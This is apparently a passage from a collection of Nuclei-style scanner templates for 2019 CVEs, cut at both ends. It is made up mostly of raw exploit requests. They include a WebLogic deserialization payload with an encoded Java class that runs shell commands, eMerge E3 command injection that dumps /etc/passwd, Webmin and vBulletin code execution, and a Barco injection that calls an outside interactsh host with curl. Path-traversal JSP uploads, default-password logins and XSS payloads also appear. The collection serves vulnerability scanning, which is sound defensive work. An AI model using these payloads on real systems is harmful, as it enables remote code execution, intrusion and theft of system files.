index=\"4611\"><byte>4</byte></void><void index=\"4612\"><byte>80</byte></void><void index=\"4613\"><byte>119</byte></void><void index=\"4614\"><byte>110</byte></void><void index=\"4615\"><byte>114</byte></void><void index=\"4616\"><byte>112</byte></void><void index=\"4617\"><byte>119</byte></void><void index=\"4618\"><byte>1</byte></void><void index=\"4619\"><byte>0</byte></void><void index=\"4620\"><byte>120</byte></void><void index=\"4621\"><byte>115</byte></void><void index=\"4622\"><byte>125</byte></void><void index=\"4623\"><byte>0</byte></void><void index=\"4624\"><byte>0</byte></void><void index=\"4625\"><byte>0</byte></void><void index=\"4626\"><byte>1</byte></void><void index=\"4627\"><byte>0</byte></void><void index=\"4628\"><byte>29</byte></void><void index=\"4629\"><byte>106</byte></void><void index=\"4630\"><byte>97</byte></void><void index=\"4631\"><byte>118</byte></void><void index=\"4632\"><byte>97</byte></void><void index=\"4633\"><byte>120</byte></void><void index=\"4634\"><byte>46</byte></void><void index=\"4635\"><byte>120</byte></void><void index=\"4636\"><byte>109</byte></void><void index=\"4637\"><byte>108</byte></void><void index=\"4638\"><byte>46</byte></void><void index=\"4639\"><byte>116</byte></void><void index=\"4640\"><byte>114</byte></void><void index=\"4641\"><byte>97</byte></void><void index=\"4642\"><byte>110</byte></void><void index=\"4643\"><byte>115</byte></void><void index=\"4644\"><byte>102</byte></void><void index=\"4645\"><byte>111</byte></void><void index=\"4646\"><byte>114</byte></void><void index=\"4647\"><byte>109</byte></void><void index=\"4648\"><byte>46</byte></void><void index=\"4649\"><byte>84</byte></void><void index=\"4650\"><byte>101</byte></void><void index=\"4651\"><byte>109</byte></void><void index=\"4652\"><byte>112</byte></void><void index=\"4653\"><byte>108</byte></void><void index=\"4654\"><byte>97</byte></void><void index=\"4655\"><byte>116</byte></void><void index=\"4656\"><byte>101</byte></void><void index=\"4657\"><byte>115</byte></void><void index=\"4658\"><byte>120</byte></void><void index=\"4659\"><byte>114</byte></void><void index=\"4660\"><byte>0</byte></void><void index=\"4661\"><byte>23</byte></void><void index=\"4662\"><byte>106</byte></void><void index=\"4663\"><byte>97</byte></void><void index=\"4664\"><byte>118</byte></void><void index=\"4665\"><byte>97</byte></void><void index=\"4666\"><byte>46</byte></void><void index=\"4667\"><byte>108</byte></void><void index=\"4668\"><byte>97</byte></void><void index=\"4669\"><byte>110</byte></void><void index=\"4670\"><byte>103</byte></void><void index=\"4671\"><byte>46</byte></void><void index=\"4672\"><byte>114</byte></void><void index=\"4673\"><byte>101</byte></void><void index=\"4674\"><byte>102</byte></void><void index=\"4675\"><byte>108</byte></void><void index=\"4676\"><byte>101</byte></void><void index=\"4677\"><byte>99</byte></void><void index=\"4678\"><byte>116</byte></void><void index=\"4679\"><byte>46</byte></void><void index=\"4680\"><byte>80</byte></void><void index=\"4681\"><byte>114</byte></void><void index=\"4682\"><byte>111</byte></void><void index=\"4683\"><byte>120</byte></void><void index=\"4684\"><byte>121</byte></void><void index=\"4685\"><byte>-31</byte></void><void index=\"4686\"><byte>39</byte></void><void index=\"4687\"><byte>-38</byte></void><void index=\"4688\"><byte>32</byte></void><void index=\"4689\"><byte>-52</byte></void><void index=\"4690\"><byte>16</byte></void><void index=\"4691\"><byte>67</byte></void><void index=\"4692\"><byte>-53</byte></void><void index=\"4693\"><byte>2</byte></void><void index=\"4694\"><byte>0</byte></void><void index=\"4695\"><byte>1</byte></void><void index=\"4696\"><byte>76</byte></void><void index=\"4697\"><byte>0</byte></void><void index=\"4698\"><byte>1</byte></void><void index=\"4699\"><byte>104</byte></void><void index=\"4700\"><byte>116</byte></void><void index=\"4701\"><byte>0</byte></void><void index=\"4702\"><byte>37</byte></void><void index=\"4703\"><byte>76</byte></void><void index=\"4704\"><byte>106</byte></void><void index=\"4705\"><byte>97</byte></void><void index=\"4706\"><byte>118</byte></void><void index=\"4707\"><byte>97</byte></void><void index=\"4708\"><byte>47</byte></void><void index=\"4709\"><byte>108</byte></void><void index=\"4710\"><byte>97</byte></void><void index=\"4711\"><byte>110</byte></void><void index=\"4712\"><byte>103</byte></void><void index=\"4713\"><byte>47</byte></void><void index=\"4714\"><byte>114</byte></void><void index=\"4715\"><byte>101</byte></void><void index=\"4716\"><byte>102</byte></void><void index=\"4717\"><byte>108</byte></void><void index=\"4718\"><byte>101</byte></void><void index=\"4719\"><byte>99</byte></void><void index=\"4720\"><byte>116</byte></void><void index=\"4721\"><byte>47</byte></void><void index=\"4722\"><byte>73</byte></void><void index=\"4723\"><byte>110</byte></void><void index=\"4724\"><byte>118</byte></void><void index=\"4725\"><byte>111</byte></void><void index=\"4726\"><byte>99</byte></void><void index=\"4727\"><byte>97</byte></void><void index=\"4728\"><byte>116</byte></void><void index=\"4729\"><byte>105</byte></void><void index=\"4730\"><byte>111</byte></void><void index=\"4731\"><byte>110</byte></void><void index=\"4732\"><byte>72</byte></void><void index=\"4733\"><byte>97</byte></void><void index=\"4734\"><byte>110</byte></void><void index=\"4735\"><byte>100</byte></void><void index=\"4736\"><byte>108</byte></void><void index=\"4737\"><byte>101</byte></void><void index=\"4738\"><byte>114</byte></void><void index=\"4739\"><byte>59</byte></void><void index=\"4740\"><byte>120</byte></void><void index=\"4741\"><byte>112</byte></void><void index=\"4742\"><byte>115</byte></void><void index=\"4743\"><byte>114</byte></void><void index=\"4744\"><byte>0</byte></void><void index=\"4745\"><byte>50</byte></void><void index=\"4746\"><byte>115</byte></void><void index=\"4747\"><byte>117</byte></void><void index=\"4748\"><byte>110</byte></void><void index=\"4749\"><byte>46</byte></void><void index=\"4750\"><byte>114</byte></void><void index=\"4751\"><byte>101</byte></void><void index=\"4752\"><byte>102</byte></void><void index=\"4753\"><byte>108</byte></void><void index=\"4754\"><byte>101</byte></void><void index=\"4755\"><byte>99</byte></void><void index=\"4756\"><byte>116</byte></void><void index=\"4757\"><byte>46</byte></void><void index=\"4758\"><byte>97</byte></void><void index=\"4759\"><byte>110</byte></void><void index=\"4760\"><byte>110</byte></void><void index=\"4761\"><byte>111</byte></void><void index=\"4762\"><byte>116</byte></void><void index=\"4763\"><byte>97</byte></void><void index=\"4764\"><byte>116</byte></void><void index=\"4765\"><byte>105</byte></void><void index=\"4766\"><byte>111</byte></void><void index=\"4767\"><byte>110</byte></void><void index=\"4768\"><byte>46</byte></void><void index=\"4769\"><byte>65</byte></void><void index=\"4770\"><byte>110</byte></void><void index=\"4771\"><byte>110</byte></void><void index=\"4772\"><byte>111</byte></void><void index=\"4773\"><byte>116</byte></void><void index=\"4774\"><byte>97</byte></void><void index=\"4775\"><byte>116</byte></void><void index=\"4776\"><byte>105</byte></void><void index=\"4777\"><byte>111</byte></void><void index=\"4778\"><byte>110</byte></void><void index=\"4779\"><byte>73</byte></void><void index=\"4780\"><byte>110</byte></void><void index=\"4781\"><byte>118</byte></void><void index=\"4782\"><byte>111</byte></void><void index=\"4783\"><byte>99</byte></void><void index=\"4784\"><byte>97</byte></void><void index=\"4785\"><byte>116</byte></void><void index=\"4786\"><byte>105</byte></void><void index=\"4787\"><byte>111</byte></void><void index=\"4788\"><byte>110</byte></void><void index=\"4789\"><byte>72</byte></void><void index=\"4790\"><byte>97</byte></void><void index=\"4791\"><byte>110</byte></void><void index=\"4792\"><byte>100</byte></void><void index=\"4793\"><byte>108</byte></void><void index=\"4794\"><byte>101</byte></void><void index=\"4795\"><byte>114</byte></void><void index=\"4796\"><byte>85</byte></void><void index=\"4797\"><byte>-54</byte></void><void index=\"4798\"><byte>-11</byte></void><void index=\"4799\"><byte>15</byte></void><void index=\"4800\"><byte>21</byte></void><void index=\"4801\"><byte>-53</byte></void><void index=\"4802\"><byte>126</byte></void><void index=\"4803\"><byte>-91</byte></void><void index=\"4804\"><byte>2</byte></void><void index=\"4805\"><byte>0</byte></void><void index=\"4806\"><byte>2</byte></void><void index=\"4807\"><byte>76</byte></void><void index=\"4808\"><byte>0</byte></void><void index=\"4809\"><byte>12</byte></void><void index=\"4810\"><byte>109</byte></void><void index=\"4811\"><byte>101</byte></void><void index=\"4812\"><byte>109</byte></void><void index=\"4813\"><byte>98</byte></void><void index=\"4814\"><byte>101</byte></void><void index=\"4815\"><byte>114</byte></void><void index=\"4816\"><byte>86</byte></void><void index=\"4817\"><byte>97</byte></void><void index=\"4818\"><byte>108</byte></void><void index=\"4819\"><byte>117</byte></void><void index=\"4820\"><byte>101</byte></void><void index=\"4821\"><byte>115</byte></void><void index=\"4822\"><byte>116</byte></void><void index=\"4823\"><byte>0</byte></void><void index=\"4824\"><byte>15</byte></void><void index=\"4825\"><byte>76</byte></void><void index=\"4826\"><byte>106</byte></void><void index=\"4827\"><byte>97</byte></void><void index=\"4828\"><byte>118</byte></void><void index=\"4829\"><byte>97</byte></void><void index=\"4830\"><byte>47</byte></void><void index=\"4831\"><byte>117</byte></void><void index=\"4832\"><byte>116</byte></void><void index=\"4833\"><byte>105</byte></void><void index=\"4834\"><byte>108</byte></void><void index=\"4835\"><byte>47</byte></void><void index=\"4836\"><byte>77</byte></void><void index=\"4837\"><byte>97</byte></void><void index=\"4838\"><byte>112</byte></void><void index=\"4839\"><byte>59</byte></void><void index=\"4840\"><byte>76</byte></void><void index=\"4841\"><byte>0</byte></void><void index=\"4842\"><byte>4</byte></void><void index=\"4843\"><byte>116</byte></void><void index=\"4844\"><byte>121</byte></void><void index=\"4845\"><byte>112</byte></void><void index=\"4846\"><byte>101</byte></void><void index=\"4847\"><byte>116</byte></void><void index=\"4848\"><byte>0</byte></void><void index=\"4849\"><byte>17</byte></void><void index=\"4850\"><byte>76</byte></void><void index=\"4851\"><byte>106</byte></void><void index=\"4852\"><byte>97</byte></void><void index=\"4853\"><byte>118</byte></void><void index=\"4854\"><byte>97</byte></void><void index=\"4855\"><byte>47</byte></void><void index=\"4856\"><byte>108</byte></void><void index=\"4857\"><byte>97</byte></void><void index=\"4858\"><byte>110</byte></void><void index=\"4859\"><byte>103</byte></void><void index=\"4860\"><byte>47</byte></void><void index=\"4861\"><byte>67</byte></void><void index=\"4862\"><byte>108</byte></void><void index=\"4863\"><byte>97</byte></void><void index=\"4864\"><byte>115</byte></void><void index=\"4865\"><byte>115</byte></void><void index=\"4866\"><byte>59</byte></void><void index=\"4867\"><byte>120</byte></void><void index=\"4868\"><byte>112</byte></void><void index=\"4869\"><byte>115</byte></void><void index=\"4870\"><byte>114</byte></void><void index=\"4871\"><byte>0</byte></void><void index=\"4872\"><byte>17</byte></void><void index=\"4873\"><byte>106</byte></void><void index=\"4874\"><byte>97</byte></void><void index=\"4875\"><byte>118</byte></void><void index=\"4876\"><byte>97</byte></void><void index=\"4877\"><byte>46</byte></void><void index=\"4878\"><byte>117</byte></void><void index=\"4879\"><byte>116</byte></void><void index=\"4880\"><byte>105</byte></void><void index=\"4881\"><byte>108</byte></void><void index=\"4882\"><byte>46</byte></void><void index=\"4883\"><byte>72</byte></void><void index=\"4884\"><byte>97</byte></void><void index=\"4885\"><byte>115</byte></void><void index=\"4886\"><byte>104</byte></void><void index=\"4887\"><byte>77</byte></void><void index=\"4888\"><byte>97</byte></void><void index=\"4889\"><byte>112</byte></void><void index=\"4890\"><byte>5</byte></void><void index=\"4891\"><byte>7</byte></void><void index=\"4892\"><byte>-38</byte></void><void index=\"4893\"><byte>-63</byte></void><void index=\"4894\"><byte>-61</byte></void><void index=\"4895\"><byte>22</byte></void><void index=\"4896\"><byte>96</byte></void><void index=\"4897\"><byte>-47</byte></void><void index=\"4898\"><byte>3</byte></void><void index=\"4899\"><byte>0</byte></void><void index=\"4900\"><byte>2</byte></void><void index=\"4901\"><byte>70</byte></void><void index=\"4902\"><byte>0</byte></void><void index=\"4903\"><byte>10</byte></void><void index=\"4904\"><byte>108</byte></void><void index=\"4905\"><byte>111</byte></void><void index=\"4906\"><byte>97</byte></void><void index=\"4907\"><byte>100</byte></void><void index=\"4908\"><byte>70</byte></void><void index=\"4909\"><byte>97</byte></void><void index=\"4910\"><byte>99</byte></void><void index=\"4911\"><byte>116</byte></void><void index=\"4912\"><byte>111</byte></void><void index=\"4913\"><byte>114</byte></void><void index=\"4914\"><byte>73</byte></void><void index=\"4915\"><byte>0</byte></void><void index=\"4916\"><byte>9</byte></void><void index=\"4917\"><byte>116</byte></void><void index=\"4918\"><byte>104</byte></void><void index=\"4919\"><byte>114</byte></void><void index=\"4920\"><byte>101</byte></void><void index=\"4921\"><byte>115</byte></void><void index=\"4922\"><byte>104</byte></void><void index=\"4923\"><byte>111</byte></void><void index=\"4924\"><byte>108</byte></void><void index=\"4925\"><byte>100</byte></void><void index=\"4926\"><byte>120</byte></void><void index=\"4927\"><byte>112</byte></void><void index=\"4928\"><byte>63</byte></void><void index=\"4929\"><byte>64</byte></void><void index=\"4930\"><byte>0</byte></void><void index=\"4931\"><byte>0</byte></void><void index=\"4932\"><byte>0</byte></void><void index=\"4933\"><byte>0</byte></void><void index=\"4934\"><byte>0</byte></void><void index=\"4935\"><byte>12</byte></void><void index=\"4936\"><byte>119</byte></void><void index=\"4937\"><byte>8</byte></void><void index=\"4938\"><byte>0</byte></void><void index=\"4939\"><byte>0</byte></void><void index=\"4940\"><byte>0</byte></void><void index=\"4941\"><byte>16</byte></void><void index=\"4942\"><byte>0</byte></void><void index=\"4943\"><byte>0</byte></void><void index=\"4944\"><byte>0</byte></void><void index=\"4945\"><byte>1</byte></void><void index=\"4946\"><byte>116</byte></void><void index=\"4947\"><byte>0</byte></void><void index=\"4948\"><byte>8</byte></void><void index=\"4949\"><byte>102</byte></void><void index=\"4950\"><byte>53</byte></void><void index=\"4951\"><byte>97</byte></void><void index=\"4952\"><byte>53</byte></void><void index=\"4953\"><byte>97</byte></void><void index=\"4954\"><byte>54</byte></void><void index=\"4955\"><byte>48</byte></void><void index=\"4956\"><byte>56</byte></void><void index=\"4957\"><byte>113</byte></void><void index=\"4958\"><byte>0</byte></void><void index=\"4959\"><byte>126</byte></void><void index=\"4960\"><byte>0</byte></void><void index=\"4961\"><byte>9</byte></void><void index=\"4962\"><byte>120</byte></void><void index=\"4963\"><byte>118</byte></void><void index=\"4964\"><byte>114</byte></void><void index=\"4965\"><byte>0</byte></void><void index=\"4966\"><byte>29</byte></void><void index=\"4967\"><byte>106</byte></void><void index=\"4968\"><byte>97</byte></void><void index=\"4969\"><byte>118</byte></void><void index=\"4970\"><byte>97</byte></void><void index=\"4971\"><byte>120</byte></void><void index=\"4972\"><byte>46</byte></void><void index=\"4973\"><byte>120</byte></void><void index=\"4974\"><byte>109</byte></void><void index=\"4975\"><byte>108</byte></void><void index=\"4976\"><byte>46</byte></void><void index=\"4977\"><byte>116</byte></void><void index=\"4978\"><byte>114</byte></void><void index=\"4979\"><byte>97</byte></void><void index=\"4980\"><byte>110</byte></void><void index=\"4981\"><byte>115</byte></void><void index=\"4982\"><byte>102</byte></void><void index=\"4983\"><byte>111</byte></void><void index=\"4984\"><byte>114</byte></void><void index=\"4985\"><byte>109</byte></void><void index=\"4986\"><byte>46</byte></void><void index=\"4987\"><byte>84</byte></void><void index=\"4988\"><byte>101</byte></void><void index=\"4989\"><byte>109</byte></void><void index=\"4990\"><byte>112</byte></void><void index=\"4991\"><byte>108</byte></void><void index=\"4992\"><byte>97</byte></void><void index=\"4993\"><byte>116</byte></void><void index=\"4994\"><byte>101</byte></void><void index=\"4995\"><byte>115</byte></void><void index=\"4996\"><byte>0</byte></void><void index=\"4997\"><byte>0</byte></void><void index=\"4998\"><byte>0</byte></void><void index=\"4999\"><byte>0</byte></void><void index=\"5000\"><byte>0</byte></void><void index=\"5001\"><byte>0</byte></void><void index=\"5002\"><byte>0</byte></void><void index=\"5003\"><byte>0</byte></void><void index=\"5004\"><byte>0</byte></void><void index=\"5005\"><byte>0</byte></void><void index=\"5006\"><byte>0</byte></void><void index=\"5007\"><byte>120</byte></void><void index=\"5008\"><byte>112</byte></void><void index=\"5009\"><byte>120</byte></void></array></void></class></work:WorkContext></soapenv:Header><soapenv:Body></soapenv:Body></soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>id</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7256","info":{"name":"eMerge E3 1.00-06 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20{{file}}.txt%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /{{file}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15858","info":{"name":"WordPress Woody Ad Snippets <2.2.5 - Cross-Site Scripting/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/insert-php/readme.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","negative":true,"words":["2.2.5"]},{"type":"word","part":"body","words":["Changelog"]},{"type":"word","part":"body","words":["Woody ad snippets"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11581","info":{"name":"Atlassian Jira Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ContactAdministrators!default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Contact Site Administrators"]},{"type":"word","part":"body","negative":true,"words":["has not yet configured this contact form"]},{"type":"regex","part":"body","regex":["\\(v4\\.4\\.","\\(v5\\.","\\(v6\\.","\\(v7\\.[012345789]\\.","\\(v7\\.1[0-2]\\.","\\(v7\\.6\\.([0-9]|[1][0-3])","\\(v7\\.\\13\\.[0-4]","\\(v8\\.0\\.[0-2]","\\(v8\\.1\\.[0-1]","\\(v8\\.2\\.[0-2]"],"condition":"or"}]}]},{"id":"CVE-2019-0230","info":{"name":"Apache Struts <=2.5.20 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id={{str}}%25{128*128}"],"matchers":[{"type":"word","part":"body","words":["{{str}}16384"]}]}]},{"id":"CVE-2019-11580","info":{"name":"Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /crowd/admin/uploadplugin.action HTTP/2\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7\nExpect: 100-continue\n\n------------------------------f15fe87e95a7\nContent-Disposition: form-data; name=\"file_cdl\"; filename=\"rce.jar\"\nContent-Type: application/octet-stream\n\n{{plugin}}\n------------------------------f15fe87e95a7--\n","GET /crowd/plugins/servlet/exp HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2019-11580"]}]}]},{"id":"CVE-2019-15642","info":{"name":"Webmin < 1.920 - Authenticated Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nCookie: redirect=1; testing=1\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nAccept-Encoding: gzip, deflate\n\nuser={{username}}&pass={{password}}\n","POST /rpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{RootURL}}/sysinfo.cgi?xnavigation=1\nAccept-Encoding: gzip, deflate\n\nOBJECT Socket;print \"Content-Type: text/plain\\n\\n\";$cmd={{cmd}};print \"$cmd\\n\\n\";\n"],"attack":"pitchfork","payloads":{"username":["admin","root"],"password":["admin","root"]},"stop-at-first-match":true,"host-redirects":true,"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["uid=(\\d+)\\(.*?\\) gid=(\\d+)\\(.*?\\) groups=(\\d+)\\(.*?\\)"]},{"type":"word","part":"body_2","words":["Content-type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16759","info":{"name":"vBulletin 5.0.0-5.5.4 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsubWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["addcc9f9f2f40e2e6aca3079b73d9d17"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15811","info":{"name":"DomainMOD <=4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"onfocus=\\\"alert(document.domain)\\\"autofocus=\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2019-3929","info":{"name":"Barco/AWIND OEM Presentation Platform - Remote Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/cgi-bin/file_transfer.cgi"],"body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-7275","info":{"name":"Optergy Proton/Enterprise Building Management System - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/updating.jsp?url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2019-17444","info":{"name":"Jfrog Artifactory <6.17.0 - Default Admin Password","severity":"critical"},"requests":[{"raw":["POST /ui/api/v1/ui/auth/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{RootURL}}\n\n{\"user\":\"admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\":\"admin\"","\"admin\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9955","info":{"name":"Zyxel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"],"matchers":[{"type":"word","part":"body","words":["\";alert('1');//","<title>Welcome</title>"],"condition":"and"}]}]},{"id":"CVE-2019-3398","info":{"name":"Atlassian Confluence Download Attachments - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=\n","GET /pages/createpage.action HTTP/1.1\nHost: {{Hostname}}\n","POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1\nHost: {{Hostname}}\n\n${{{num1}}*{{num2}}}\n","GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1\nHost: 